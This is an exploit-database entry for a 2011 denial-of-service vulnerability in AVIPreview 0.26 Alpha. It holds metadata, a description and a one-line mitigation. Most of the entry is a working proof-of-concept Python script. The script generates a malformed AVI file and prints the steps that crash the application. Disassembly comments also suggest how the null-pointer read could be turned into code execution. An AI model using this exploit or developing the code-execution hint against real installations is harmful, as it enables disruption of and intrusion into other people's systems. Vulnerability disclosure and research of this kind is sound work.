AVIPreview 0.26 Alpha Denial of Service Vulnerability

vendor:

AVIPreview

by:

BraniX

7,5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: AVIPreview

Affected Version From: 0.26 Alpha

Affected Version To: 0.26 Alpha

Patch Exists: Yes

Related CWE: N/A

CPE: a:divx_digest:avipreview

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 Home Edition

2011

AVIPreview 0.26 Alpha Denial of Service Vulnerability

AVIPreview 0.26 Alpha is vulnerable to a Denial of Service attack. The application reads memory via a null pointer, causing an Access Violation Exception. An attacker can force something malicious to the ECX register (.data is RW) and gain code execution. To exploit this vulnerability, an attacker must open a specially crafted AVI file in AVIPreview, select 'No' when the MessageBox with an error appears, navigate to the File menu and pick the recent file (which points to the AVI file). This will cause the application to crash.

Mitigation:

Upgrade to a version of AVIPreview that is not vulnerable to this attack.

Source

Exploit-DB raw data:

# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2011.03.15
# published: 2011.03.15
# tested on: Windows XP SP3 Home Edition

# App:              AVIPreview 0.26 Alpha
# App Url:          http://www.divx-digest.com/software/avipreview_aj.html
# AVIPreview.exe    MD5: 399ab43edd26c655d0876dc5ddcaa3a7

# DoS is caused by Access Violation Exception, app reads memory via null pointer

# 00405B59  8B0D E0B14100   MOV ECX,DWORD PTR DS:[41B1E0]       <-- Read from .data section DD 0h
# 00405B5F  8B11            MOV EDX,DWORD PTR DS:[ECX]          <-- Exception, but if EDX is a pointer to SH
# 00405B61  A1 E0B14100     MOV EAX,DWORD PTR DS:[41B1E0]
# 00405B66  50              PUSH EAX
# 00405B67  FF52 30         CALL DWORD PTR DS:[EDX+30]          <-- We will have LCE

# if exploiter can force something minigfull to ECX (.data is RW)
# so he/she will have code execution 

path = "C:\\DoS.avi"
f = open(path, "wb")
f.write('\x41' * 500000)
f.close()

print "File generated: " + path
print "In order to DoS AVIPreview 0.26 Alpha execute following steps\n"

print "1. Open file '" + path + "'in AVIPreview, application will show MessageBox with error, but will not crash"
print "2. Select 'No', otherway AVIPreview will pop-up browser"
print "3. Navigate to File menu and pick recent file (which point to our AVI file)"
print "4. You have DoS :>"